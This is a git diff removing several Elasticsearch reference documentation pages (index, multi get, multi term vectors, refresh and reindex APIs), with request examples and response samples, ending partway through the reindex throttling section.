-include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=refresh] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -`timeout`:: -+ --- -(Optional, <>) -Period the request waits for the following operations: - -* <> -* <> updates -* <> - -Defaults to `1m` (one minute). This guarantees {es} waits for at least the -timeout before failing. The actual wait time could be longer, particularly when -multiple waits occur. --- - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=doc-version] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=version_type] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=wait_for_active_shards] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=require-alias] - -[[docs-index-api-request-body]] -==== {api-request-body-title} - -``:: -(Required, string) Request body contains the JSON source for the document -data. - -[[docs-index-api-response-body]] -==== {api-response-body-title} - -`_shards`:: -Provides information about the replication process of the index operation. - -`_shards.total`:: -Indicates how many shard copies (primary and replica shards) the index operation -should be executed on. - -`_shards.successful`:: -Indicates the number of shard copies the index operation succeeded on. -When the index operation is successful, `successful` is at least 1. -+ -NOTE: Replica shards might not all be started when an indexing operation -returns successfully--by default, only the primary is required. Set -`wait_for_active_shards` to change this default behavior. See -<>. - -`_shards.failed`:: -An array that contains replication-related errors in the case an index operation -failed on a replica shard. 0 indicates there were no failures. - -`_index`:: -The name of the index the document was added to. - -`_type`:: -The document type. {es} indices now support a single document type, `_doc`. - -`_id`:: -The unique identifier for the added document. - -`_version`:: -The document version. Incremented each time the document is updated. - -`_seq_no`:: -The sequence number assigned to the document for the indexing operation. -Sequence numbers are used to ensure an older version of a document -doesn’t overwrite a newer version. See <>. - -`_primary_term`:: -The primary term assigned to the document for the indexing operation. -See <>. - -`result`:: -The result of the indexing operation, `created` or `updated`. - -[[docs-index-api-desc]] -==== {api-description-title} - -You can index a new JSON document with the `_doc` or `_create` resource. Using -`_create` guarantees that the document is only indexed if it does not already -exist. To update an existing document, you must use the `_doc` resource. - -[[index-creation]] -===== Automatically create data streams and indices - -If request's target doesn't exist and matches an -<>, the index operation automatically creates the data stream. See -<>. - -If the target doesn't exist and doesn't match a data stream template, -the operation automatically creates the index and applies any matching -<>. - -[IMPORTANT] -==== -{es} has built-in index templates for the `metrics-*-*`, `logs-*-*`, and `synthetics-*-*` index -patterns, each with a priority of `100`. -{ingest-guide}/fleet-overview.html[{agent}] uses these templates to -create data streams. If you use {agent}, assign your index templates a priority -lower than `100` to avoid overriding the built-in templates. - -Otherwise, to avoid accidentally applying the built-in templates, use a -non-overlapping index pattern or assign templates with an overlapping pattern a -`priority` higher than `100`. - -For example, if you don't use {agent} and want to create a template for the -`logs-*` index pattern, assign your template a priority of `200`. This ensures -your template is applied instead of the built-in template for `logs-*-*`. -==== - -If no mapping exists, the index operation -creates a dynamic mapping. By default, new fields and objects are -automatically added to the mapping if needed. For more information about field -mapping, see <> and the <> API. - -Automatic index creation is controlled by the `action.auto_create_index` -setting. This setting defaults to `true`, which allows any index to be created -automatically. You can modify this setting to explicitly allow or block -automatic creation of indices that match specified patterns, or set it to -`false` to disable automatic index creation entirely. Specify a -comma-separated list of patterns you want to allow, or prefix each pattern with -`+` or `-` to indicate whether it should be allowed or blocked. When a list is -specified, the default behaviour is to disallow. - -IMPORTANT: The `action.auto_create_index` setting only affects the automatic -creation of indices. It does not affect the creation of data streams. - -[source,console] --------------------------------------------------- -PUT _cluster/settings -{ - "persistent": { - "action.auto_create_index": "my-index-000001,index10,-index1*,+ind*" <1> - } -} - -PUT _cluster/settings -{ - "persistent": { - "action.auto_create_index": "false" <2> - } -} - -PUT _cluster/settings -{ - "persistent": { - "action.auto_create_index": "true" <3> - } -} --------------------------------------------------- - -<1> Allow auto-creation of indices called `my-index-000001` or `index10`, block the -creation of indices that match the pattern `index1*`, and allow creation of -any other indices that match the `ind*` pattern. Patterns are matched in -the order specified. - -<2> Disable automatic index creation entirely. - -<3> Allow automatic creation of any index. This is the default. - -[discrete] -[[operation-type]] -===== Put if absent - -You can force a create operation by using the `_create` resource or -setting the `op_type` parameter to _create_. In this case, -the index operation fails if a document with the specified ID -already exists in the index. - -[discrete] -[[create-document-ids-automatically]] -===== Create document IDs automatically - -When using the `POST //_doc/` request format, the `op_type` is -automatically set to `create` and the index operation generates a unique ID for -the document. - -[source,console] --------------------------------------------------- -POST my-index-000001/_doc/ -{ - "@timestamp": "2099-11-15T13:12:00", - "message": "GET /search HTTP/1.1 200 1070000", - "user": { - "id": "kimchy" - } -} --------------------------------------------------- - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "_shards": { - "total": 2, - "failed": 0, - "successful": 2 - }, - "_index": "my-index-000001", - "_type": "_doc", - "_id": "W0tpsmIBdwcYyG50zbta", - "_version": 1, - "_seq_no": 0, - "_primary_term": 1, - "result": "created" -} --------------------------------------------------- -// TESTRESPONSE[s/W0tpsmIBdwcYyG50zbta/$body._id/ s/"successful": 2/"successful": 1/] - -[discrete] -[[optimistic-concurrency-control-index]] -===== Optimistic concurrency control - -Index operations can be made conditional and only be performed if the last -modification to the document was assigned the sequence number and primary -term specified by the `if_seq_no` and `if_primary_term` parameters. If a -mismatch is detected, the operation will result in a `VersionConflictException` -and a status code of 409. See <> for more details. - -[discrete] -[[index-routing]] -===== Routing - -By default, shard placement -- or `routing` -- is controlled by using a -hash of the document's id value. For more explicit control, the value -fed into the hash function used by the router can be directly specified -on a per-operation basis using the `routing` parameter. For example: - -[source,console] --------------------------------------------------- -POST my-index-000001/_doc?routing=kimchy -{ - "@timestamp": "2099-11-15T13:12:00", - "message": "GET /search HTTP/1.1 200 1070000", - "user": { - "id": "kimchy" - } -} --------------------------------------------------- - -In this example, the document is routed to a shard based on -the `routing` parameter provided: "kimchy". - -When setting up explicit mapping, you can also use the `_routing` field -to direct the index operation to extract the routing value from the -document itself. This does come at the (very minimal) cost of an -additional document parsing pass. If the `_routing` mapping is defined -and set to be `required`, the index operation will fail if no routing -value is provided or extracted. - -NOTE: Data streams do not support custom routing. Instead, target the -appropriate backing index for the stream. - -[discrete] -[[index-distributed]] -===== Distributed - -The index operation is directed to the primary shard based on its route -(see the Routing section above) and performed on the actual node -containing this shard. After the primary shard completes the operation, -if needed, the update is distributed to applicable replicas. - -[discrete] -[[index-wait-for-active-shards]] -===== Active shards - -To improve the resiliency of writes to the system, indexing operations -can be configured to wait for a certain number of active shard copies -before proceeding with the operation. If the requisite number of active -shard copies are not available, then the write operation must wait and -retry, until either the requisite shard copies have started or a timeout -occurs. By default, write operations only wait for the primary shards -to be active before proceeding (i.e. `wait_for_active_shards=1`). -This default can be overridden in the index settings dynamically -by setting `index.write.wait_for_active_shards`. To alter this behavior -per operation, the `wait_for_active_shards` request parameter can be used. - -Valid values are `all` or any positive integer up to the total number -of configured copies per shard in the index (which is `number_of_replicas+1`). -Specifying a negative value or a number greater than the number of -shard copies will throw an error. - -For example, suppose we have a cluster of three nodes, `A`, `B`, and `C` and -we create an index `index` with the number of replicas set to 3 (resulting in -4 shard copies, one more copy than there are nodes). If we -attempt an indexing operation, by default the operation will only ensure -the primary copy of each shard is available before proceeding. This means -that even if `B` and `C` went down, and `A` hosted the primary shard copies, -the indexing operation would still proceed with only one copy of the data. -If `wait_for_active_shards` is set on the request to `3` (and all 3 nodes -are up), then the indexing operation will require 3 active shard copies -before proceeding, a requirement which should be met because there are 3 -active nodes in the cluster, each one holding a copy of the shard. However, -if we set `wait_for_active_shards` to `all` (or to `4`, which is the same), -the indexing operation will not proceed as we do not have all 4 copies of -each shard active in the index. The operation will timeout -unless a new node is brought up in the cluster to host the fourth copy of -the shard. - -It is important to note that this setting greatly reduces the chances of -the write operation not writing to the requisite number of shard copies, -but it does not completely eliminate the possibility, because this check -occurs before the write operation commences. Once the write operation -is underway, it is still possible for replication to fail on any number of -shard copies but still succeed on the primary. The `_shards` section of the -write operation's response reveals the number of shard copies on which -replication succeeded/failed. - -[source,js] --------------------------------------------------- -{ - "_shards": { - "total": 2, - "failed": 0, - "successful": 2 - } -} --------------------------------------------------- -// NOTCONSOLE - -[discrete] -[[index-refresh]] -===== Refresh - -Control when the changes made by this request are visible to search. See -<>. - -[discrete] -[[index-noop]] -===== Noop updates - -When updating a document using the index API a new version of the document is -always created even if the document hasn't changed. If this isn't acceptable -use the `_update` API with `detect_noop` set to true. This option isn't -available on the index API because the index API doesn't fetch the old source -and isn't able to compare it against the new source. - -There isn't a hard and fast rule about when noop updates aren't acceptable. -It's a combination of lots of factors like how frequently your data source -sends updates that are actually noops and how many queries per second -Elasticsearch runs on the shard receiving the updates. - -[discrete] -[[timeout]] -===== Timeout - -The primary shard assigned to perform the index operation might not be -available when the index operation is executed. Some reasons for this -might be that the primary shard is currently recovering from a gateway -or undergoing relocation. By default, the index operation will wait on -the primary shard to become available for up to 1 minute before failing -and responding with an error. The `timeout` parameter can be used to -explicitly specify how long it waits. Here is an example of setting it -to 5 minutes: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1?timeout=5m -{ - "@timestamp": "2099-11-15T13:12:00", - "message": "GET /search HTTP/1.1 200 1070000", - "user": { - "id": "kimchy" - } -} --------------------------------------------------- - -[discrete] -[[index-versioning]] -===== Versioning - -Each indexed document is given a version number. By default, -internal versioning is used that starts at 1 and increments -with each update, deletes included. Optionally, the version number can be -set to an external value (for example, if maintained in a -database). To enable this functionality, `version_type` should be set to -`external`. The value provided must be a numeric, long value greater than or equal to 0, -and less than around 9.2e+18. - -When using the external version type, the system checks to see if -the version number passed to the index request is greater than the -version of the currently stored document. If true, the document will be -indexed and the new version number used. If the value provided is less -than or equal to the stored document's version number, a version -conflict will occur and the index operation will fail. For example: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1?version=2&version_type=external -{ - "user": { - "id": "elkbee" - } -} --------------------------------------------------- -// TEST[continued] - -NOTE: Versioning is completely real time, and is not affected by the -near real time aspects of search operations. If no version is provided, -then the operation is executed without any version checks. - -In the previous example, the operation will succeed since the supplied -version of 2 is higher than -the current document version of 1. If the document was already updated -and its version was set to 2 or higher, the indexing command will fail -and result in a conflict (409 http status code). - -A nice side effect is that there is no need to maintain strict ordering -of async indexing operations executed as a result of changes to a source -database, as long as version numbers from the source database are used. -Even the simple case of updating the Elasticsearch index using data from -a database is simplified if external versioning is used, as only the -latest version will be used if the index operations arrive out of order for -whatever reason. - -[discrete] -[[index-version-types]] -===== Version types - -In addition to the `external` version type, Elasticsearch -also supports other types for specific use cases: - -[[_version_types]] -`internal`:: Only index the document if the given version is identical to the version -of the stored document. - -`external` or `external_gt`:: Only index the document if the given version is strictly higher -than the version of the stored document *or* if there is no existing document. The given -version will be used as the new version and will be stored with the new document. The supplied -version must be a non-negative long number. - -`external_gte`:: Only index the document if the given version is *equal* or higher -than the version of the stored document. If there is no existing document -the operation will succeed as well. The given version will be used as the new version -and will be stored with the new document. The supplied version must be a non-negative long number. - -NOTE: The `external_gte` version type is meant for special use cases and -should be used with care. If used incorrectly, it can result in loss of data. -There is another option, `force`, which is deprecated because it can cause -primary and replica shards to diverge. - -[[docs-index-api-example]] -==== {api-examples-title} - -Insert a JSON document into the `my-index-000001` index with an `_id` of 1: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1 -{ - "@timestamp": "2099-11-15T13:12:00", - "message": "GET /search HTTP/1.1 200 1070000", - "user": { - "id": "kimchy" - } -} --------------------------------------------------- - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "_shards": { - "total": 2, - "failed": 0, - "successful": 2 - }, - "_index": "my-index-000001", - "_type": "_doc", - "_id": "1", - "_version": 1, - "_seq_no": 0, - "_primary_term": 1, - "result": "created" -} --------------------------------------------------- -// TESTRESPONSE[s/"successful": 2/"successful": 1/] - -Use the `_create` resource to index a document into the `my-index-000001` index if -no document with that ID exists: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_create/1 -{ - "@timestamp": "2099-11-15T13:12:00", - "message": "GET /search HTTP/1.1 200 1070000", - "user": { - "id": "kimchy" - } -} --------------------------------------------------- - -Set the `op_type` parameter to _create_ to index a document into the `my-index-000001` -index if no document with that ID exists: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1?op_type=create -{ - "@timestamp": "2099-11-15T13:12:00", - "message": "GET /search HTTP/1.1 200 1070000", - "user": { - "id": "kimchy" - } -} --------------------------------------------------- diff --git a/docs/reference/docs/multi-get.asciidoc b/docs/reference/docs/multi-get.asciidoc deleted file mode 100644 index ae29c645702..00000000000 --- a/docs/reference/docs/multi-get.asciidoc +++ /dev/null @@ -1,301 +0,0 @@ -[[docs-multi-get]] -=== Multi get (mget) API -++++ -Multi get -++++ - -Retrieves multiple JSON documents by ID. - -[source,console] --------------------------------------------------- -GET /_mget -{ - "docs": [ - { - "_index": "my-index-000001", - "_id": "1" - }, - { - "_index": "my-index-000001", - "_id": "2" - } - ] -} --------------------------------------------------- -// TEST[setup:my_index] - -[[docs-multi-get-api-request]] -==== {api-request-title} - -`GET /_mget` - -`GET //_mget` - -[[docs-multi-get-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `read` -<> for the target index or index alias. - -[[docs-multi-get-api-desc]] -==== {api-description-title} - -You use `mget` to retrieve multiple documents from one or more indices. -If you specify an index in the request URI, you only need to specify the document IDs in the request body. - -[[mget-security]] -===== Security - -See <>. - -[[multi-get-partial-responses]] -===== Partial responses - -To ensure fast responses, the multi get API responds with partial results if one or more shards fail. -See <> for more information. - -[[docs-multi-get-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) Name of the index to retrieve documents from when `ids` are specified, -or when a document in the `docs` array does not specify an index. - -[[docs-multi-get-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=preference] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=realtime] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=refresh] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=stored_fields] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_excludes] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=source_includes] - -[[docs-multi-get-api-request-body]] -==== {api-request-body-title} - -`docs`:: -(Optional, array) The documents you want to retrieve. -Required if no index is specified in the request URI. -You can specify the following attributes for each -document: -+ --- -`_id`:: -(Required, string) The unique document ID. - -`_index`:: -(Optional, string) -The index that contains the document. -Required if no index is specified in the request URI. - -`_routing`:: -(Optional, string) The key for the primary shard the document resides on. -Required if routing is used during indexing. - -`_source`:: -(Optional, Boolean) If `false`, excludes all `_source` fields. Defaults to `true`. -`source_include`::: -(Optional, array) The fields to extract and return from the `_source` field. -`source_exclude`::: -(Optional, array) The fields to exclude from the returned `_source` field. - -`_stored_fields`:: -(Optional, array) The stored fields you want to retrieve. --- - -`ids`:: -(Optional, array) The IDs of the documents you want to retrieve. -Allowed when the index is specified in the request URI. - -[[multi-get-api-response-body]] -==== {api-response-body-title} - -The response includes a `docs` array that contains the documents in the order specified in the request. -The structure of the returned documents is similar to that returned by the <> API. -If there is a failure getting a particular document, the error is included in place of the document. - -[[docs-multi-get-api-example]] -==== {api-examples-title} - -[[mget-ids]] -===== Get documents by ID - -If you specify an index in the request URI, only the document IDs are required in the request body: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_mget -{ - "docs": [ - { - "_type": "_doc", - "_id": "1" - }, - { - "_type": "_doc", - "_id": "2" - } - ] -} --------------------------------------------------- - -And type: - -[source,console] --------------------------------------------------- -GET /test/_doc/_mget -{ - "docs": [ - { - "_id": "1" - }, - { - "_id": "2" - } - ] -} --------------------------------------------------- -// TEST[setup:my_index] - -You can use the `ids` element to simplify the request: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_mget -{ - "ids" : ["1", "2"] -} --------------------------------------------------- -// TEST[setup:my_index] - -[[mget-source-filtering]] -===== Filter source fields - -By default, the `_source` field is returned for every document (if stored). -Use the `_source` and `_source_include` or `source_exclude` attributes to -filter what fields are returned for a particular document. -You can include the `_source`, `_source_includes`, and `_source_excludes` query parameters in the -request URI to specify the defaults to use when there are no per-document instructions. - -For example, the following request sets `_source` to false for document 1 to exclude the -source entirely, retrieves `field3` and `field4` from document 2, and retrieves the `user` field -from document 3 but filters out the `user.location` field. - -[source,console] --------------------------------------------------- -GET /_mget -{ - "docs": [ - { - "_index": "test", - "_type": "_doc", - "_id": "1", - "_source": false - }, - { - "_index": "test", - "_type": "_doc", - "_id": "2", - "_source": [ "field3", "field4" ] - }, - { - "_index": "test", - "_type": "_doc", - "_id": "3", - "_source": { - "include": [ "user" ], - "exclude": [ "user.location" ] - } - } - ] -} --------------------------------------------------- - -[[mget-fields]] -===== Get stored fields - -Use the `stored_fields` attribute to specify the set of stored fields you want -to retrieve. Any requested fields that are not stored are ignored. -You can include the `stored_fields` query parameter in the request URI to specify the defaults -to use when there are no per-document instructions. - -For example, the following request retrieves `field1` and `field2` from document 1, and -`field3` and `field4`from document 2: - -[source,console] --------------------------------------------------- -GET /_mget -{ - "docs": [ - { - "_index": "test", - "_type": "_doc", - "_id": "1", - "stored_fields": [ "field1", "field2" ] - }, - { - "_index": "test", - "_type": "_doc", - "_id": "2", - "stored_fields": [ "field3", "field4" ] - } - ] -} --------------------------------------------------- - -The following request retrieves `field1` and `field2` from all documents by default. -These default fields are returned for document 1, but -overridden to return `field3` and `field4` for document 2. - -[source,console] --------------------------------------------------- -GET /test/_doc/_mget?stored_fields=field1,field2 -{ - "docs": [ - { - "_id": "1" - }, - { - "_id": "2", - "stored_fields": [ "field3", "field4" ] - } - ] -} --------------------------------------------------- - -[[mget-routing]] -===== Specify document routing - -If routing is used during indexing, you need to specify the routing value to retrieve documents. -For example, the following request fetches `test/_doc/2` from the shard corresponding to routing key `key1`, -and fetches `test/_doc/1` from the shard corresponding to routing key `key2`. - -[source,console] --------------------------------------------------- -GET /_mget?routing=key1 -{ - "docs": [ - { - "_index": "test", - "_type": "_doc", - "_id": "1", - "routing": "key2" - }, - { - "_index": "test", - "_type": "_doc", - "_id": "2" - } - ] -} --------------------------------------------------- diff --git a/docs/reference/docs/multi-termvectors.asciidoc b/docs/reference/docs/multi-termvectors.asciidoc deleted file mode 100644 index 90b31238a5c..00000000000 --- a/docs/reference/docs/multi-termvectors.asciidoc +++ /dev/null @@ -1,160 +0,0 @@ -[[docs-multi-termvectors]] -=== Multi term vectors API -++++ -Multi term vectors -++++ - -Retrieves multiple term vectors with a single request. - -[source,console] --------------------------------------------------- -POST /_mtermvectors -{ - "docs": [ - { - "_index": "my-index-000001", - "_id": "2", - "term_statistics": true - }, - { - "_index": "my-index-000001", - "_id": "1", - "fields": [ - "message" - ] - } - ] -} --------------------------------------------------- -// TEST[setup:my_index] - -[[docs-multi-termvectors-api-request]] -==== {api-request-title} - -`POST /_mtermvectors` - -`POST //_mtermvectors` - -[[docs-multi-termvectors-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `read` -<> for the target index or index alias. - -[[docs-multi-termvectors-api-desc]] -==== {api-description-title} - -You can specify existing documents by index and ID or -provide artificial documents in the body of the request. -You can specify the index in the request body or request URI. - -The response contains a `docs` array with all the fetched termvectors. -Each element has the structure provided by the <> -API. - -See the <> API for more information about the information -that can be included in the response. - -[[docs-multi-termvectors-api-path-params]] -==== {api-path-parms-title} - -``:: -(Optional, string) Name of the index that contains the documents. - -[[docs-multi-termvectors-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=fields] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=field_statistics] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=offsets] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=payloads] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=positions] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=preference] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=routing] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=realtime] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=term_statistics] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=version] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=version_type] - -[discrete] -[[docs-multi-termvectors-api-example]] -==== {api-examples-title} - -If you specify an index in the request URI, the index does not need to be specified for each documents -in the request body: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_mtermvectors -{ - "docs": [ - { - "_id": "2", - "fields": [ - "message" - ], - "term_statistics": true - }, - { - "_id": "1" - } - ] -} --------------------------------------------------- -// TEST[setup:my_index] - -If all requested documents are in same index and the parameters are the same, you can use the -following simplified syntax: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_mtermvectors -{ - "ids": [ "1", "2" ], - "parameters": { - "fields": [ - "message" - ], - "term_statistics": true - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[[docs-multi-termvectors-artificial-doc]] -===== Artificial documents - -You can also use `mtermvectors` to generate term vectors for _artificial_ documents provided -in the body of the request. The mapping used is determined by the specified `_index`. - -[source,console] --------------------------------------------------- -POST /_mtermvectors -{ - "docs": [ - { - "_index": "my-index-000001", - "doc" : { - "message" : "test test test" - } - }, - { - "_index": "my-index-000001", - "doc" : { - "message" : "Another test ..." - } - } - ] -} --------------------------------------------------- -// TEST[setup:my_index] diff --git a/docs/reference/docs/refresh.asciidoc b/docs/reference/docs/refresh.asciidoc deleted file mode 100644 index 2bbac2c0b1c..00000000000 --- a/docs/reference/docs/refresh.asciidoc +++ /dev/null @@ -1,111 +0,0 @@ -[[docs-refresh]] -=== `?refresh` - -The <>, <>, <>, and -<> APIs support setting `refresh` to control when changes made -by this request are made visible to search. These are the allowed values: - -Empty string or `true`:: - -Refresh the relevant primary and replica shards (not the whole index) -immediately after the operation occurs, so that the updated document appears -in search results immediately. This should *ONLY* be done after careful thought -and verification that it does not lead to poor performance, both from an -indexing and a search standpoint. - -`wait_for`:: - -Wait for the changes made by the request to be made visible by a refresh before -replying. This doesn't force an immediate refresh, rather, it waits for a -refresh to happen. Elasticsearch automatically refreshes shards that have changed -every `index.refresh_interval` which defaults to one second. That setting is -<>. Calling the <> API or -setting `refresh` to `true` on any of the APIs that support it will also -cause a refresh, in turn causing already running requests with `refresh=wait_for` -to return. - -`false` (the default):: - -Take no refresh related actions. The changes made by this request will be made -visible at some point after the request returns. - -[discrete] -==== Choosing which setting to use -// tag::refresh-default[] -Unless you have a good reason to wait for the change to become visible, always -use `refresh=false` (the default setting). The simplest and fastest choice is to omit the `refresh` parameter from the URL. - -If you absolutely must have the changes made by a request visible synchronously -with the request, you must choose between putting more load on -Elasticsearch (`true`) and waiting longer for the response (`wait_for`). -// end::refresh-default[] -Here are a few points that should inform that decision: - -* The more changes being made to the index the more work `wait_for` saves -compared to `true`. In the case that the index is only changed once every -`index.refresh_interval` then it saves no work. -* `true` creates less efficient indexes constructs (tiny segments) that must -later be merged into more efficient index constructs (larger segments). Meaning -that the cost of `true` is paid at index time to create the tiny segment, at -search time to search the tiny segment, and at merge time to make the larger -segments. -* Never start multiple `refresh=wait_for` requests in a row. Instead batch them -into a single bulk request with `refresh=wait_for` and Elasticsearch will start -them all in parallel and return only when they have all finished. -* If the refresh interval is set to `-1`, disabling the automatic refreshes, -then requests with `refresh=wait_for` will wait indefinitely until some action -causes a refresh. Conversely, setting `index.refresh_interval` to something -shorter than the default like `200ms` will make `refresh=wait_for` come back -faster, but it'll still generate inefficient segments. -* `refresh=wait_for` only affects the request that it is on, but, by forcing a -refresh immediately, `refresh=true` will affect other ongoing request. In -general, if you have a running system you don't wish to disturb then -`refresh=wait_for` is a smaller modification. - -[discrete] -[[refresh_wait_for-force-refresh]] -==== `refresh=wait_for` Can Force a Refresh - -If a `refresh=wait_for` request comes in when there are already -`index.max_refresh_listeners` (defaults to 1000) requests waiting for a refresh -on that shard then that request will behave just as though it had `refresh` set -to `true` instead: it will force a refresh. This keeps the promise that when a -`refresh=wait_for` request returns that its changes are visible for search -while preventing unchecked resource usage for blocked requests. If a request -forced a refresh because it ran out of listener slots then its response will -contain `"forced_refresh": true`. - -Bulk requests only take up one slot on each shard that they touch no matter how -many times they modify the shard. - -[discrete] -==== Examples - -These will create a document and immediately refresh the index so it is visible: - -[source,console] --------------------------------------------------- -PUT /test/_doc/1?refresh -{"test": "test"} -PUT /test/_doc/2?refresh=true -{"test": "test"} --------------------------------------------------- - -These will create a document without doing anything to make it visible for -search: - -[source,console] --------------------------------------------------- -PUT /test/_doc/3 -{"test": "test"} -PUT /test/_doc/4?refresh=false -{"test": "test"} --------------------------------------------------- - -This will create a document and wait for it to become visible for search: - -[source,console] --------------------------------------------------- -PUT /test/_doc/4?refresh=wait_for -{"test": "test"} --------------------------------------------------- diff --git a/docs/reference/docs/reindex.asciidoc b/docs/reference/docs/reindex.asciidoc deleted file mode 100644 index 4c3b96fd9c5..00000000000 --- a/docs/reference/docs/reindex.asciidoc +++ /dev/null @@ -1,1182 +0,0 @@ -[[docs-reindex]] -=== Reindex API -++++ -Reindex -++++ - -Copies documents from a _source_ to a _destination_. - -The source and destination can be any pre-existing index, index alias, or -<>. However, the source and destination must be -different. For example, you cannot reindex a data stream into itself. - -[IMPORTANT] -================================================= -Reindex requires <> to be enabled for -all documents in the source. - -The destination should be configured as wanted before calling `_reindex`. -Reindex does not copy the settings from the source or its associated template. - -Mappings, shard counts, replicas, and so on must be configured ahead of time. -================================================= - -[source,console] --------------------------------------------------- -POST _reindex -{ - "source": { - "index": "my-index-000001" - }, - "dest": { - "index": "my-new-index-000001" - } -} --------------------------------------------------- -// TEST[setup:my_index_big] - -//// - -[source,console-result] --------------------------------------------------- -{ - "took" : 147, - "timed_out": false, - "created": 120, - "updated": 0, - "deleted": 0, - "batches": 1, - "version_conflicts": 0, - "noops": 0, - "retries": { - "bulk": 0, - "search": 0 - }, - "throttled_millis": 0, - "requests_per_second": -1.0, - "throttled_until_millis": 0, - "total": 120, - "failures" : [ ] -} --------------------------------------------------- -// TESTRESPONSE[s/"took" : 147/"took" : "$body.took"/] - -//// - -[[docs-reindex-api-request]] -==== {api-request-title} - -`POST /_reindex` - -[[docs-reindex-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the the following -security privileges: - -** The `read` <> for the source data -stream, index, or index alias. - -** The `write` index privilege for the destination data stream, index, or index -alias. - -** To automatically create a data stream or index with an reindex API request, -you must have the `auto_configure`, `create_index`, or `manage` index -privilege for the destination data stream, index, or index alias. - -** If reindexing from a remote cluster, the `source.remote.user` must have the -`monitor` <> and the `read` index -privilege for the source data stream, index, or index alias. - -* If reindexing from a remote cluster, you must explicitly allow the remote host -in the `reindex.remote.whitelist` setting of `elasticsearch.yml`. See -<>. - -* Automatic data stream creation requires a matching index template with data -stream enabled. See <>. - -[[docs-reindex-api-desc]] -==== {api-description-title} - -// tag::docs-reindex-api-desc-tag[] -Extracts the <> from the source index and indexes the documents into the destination index. -You can copy all documents to the destination index, or reindex a subset of the documents. -// end::docs-reindex-api-desc-tag[] - - -Just like <>, `_reindex` gets a -snapshot of the source but its destination must be **different** so -version conflicts are unlikely. The `dest` element can be configured like the -index API to control optimistic concurrency control. Omitting -`version_type` or setting it to `internal` causes Elasticsearch -to blindly dump documents into the destination, overwriting any that happen to have -the same ID. - -Setting `version_type` to `external` causes Elasticsearch to preserve the -`version` from the source, create any documents that are missing, and update -any documents that have an older version in the destination than they do -in the source. - -Setting `op_type` to `create` causes `_reindex` to only create missing -documents in the destination. All existing documents will cause a version -conflict. - -IMPORTANT: Because data streams are <>, -any reindex request to a destination data stream must have an `op_type` -of`create`. A reindex can only add new documents to a destination data stream. -It cannot update existing documents in a destination data stream. - -By default, version conflicts abort the `_reindex` process. -To continue reindexing if there are conflicts, set the `"conflicts"` request body parameter to `proceed`. -In this case, the response includes a count of the version conflicts that were encountered. -Note that the handling of other error types is unaffected by the `"conflicts"` parameter. - -[[docs-reindex-task-api]] -===== Running reindex asynchronously - -If the request contains `wait_for_completion=false`, {es} -performs some preflight checks, launches the request, and returns a -<> you can use to cancel or get the status of the task. -{es} creates a record of this task as a document at `.tasks/_doc/${taskId}`. -When you are done with a task, you should delete the task document so -{es} can reclaim the space. - -[[docs-reindex-from-multiple-sources]] -===== Reindex from multiple sources -If you have many sources to reindex it is generally better to reindex them -one at a time rather than using a glob pattern to pick up multiple sources. That -way you can resume the process if there are any errors by removing the -partially completed source and starting over. It also makes -parallelizing the process fairly simple: split the list of sources to reindex -and run each list in parallel. - -One-off bash scripts seem to work nicely for this: - -[source,bash] ----------------------------------------------------------------- -for index in i1 i2 i3 i4 i5; do - curl -HContent-Type:application/json -XPOST localhost:9200/_reindex?pretty -d'{ - "source": { - "index": "'$index'" - }, - "dest": { - "index": "'$index'-reindexed" - } - }' -done ----------------------------------------------------------------- -// NOTCONSOLE - -[[docs-reindex-throttle]] -===== Throttling - -Set `requests_per_second` to any positive decimal number (`1.4`, `6`, -`1000`, etc.) to throttle the rate at which `_reindex` issues batches of index -operations. Requests are throttled by padding each batch with a wait time. -To disable throttling, set `requests_per_second` to `-1`. - -The throttling is done by waiting between batches so that the `scroll` that `_reindex` -uses internally can be given a timeout that takes into account the padding. -The padding time is the difference between the batch size divided by the -`requests_per_second` and the time spent writing. By default the batch size is -`1000`, so if `requests_per_second` is set to `500`: - -[source,txt] --------------------------------------------------- -target_time = 1000 / 500 per second = 2 seconds -wait_time = target_time - write_time = 2 seconds - .5 seconds = 1.5 seconds 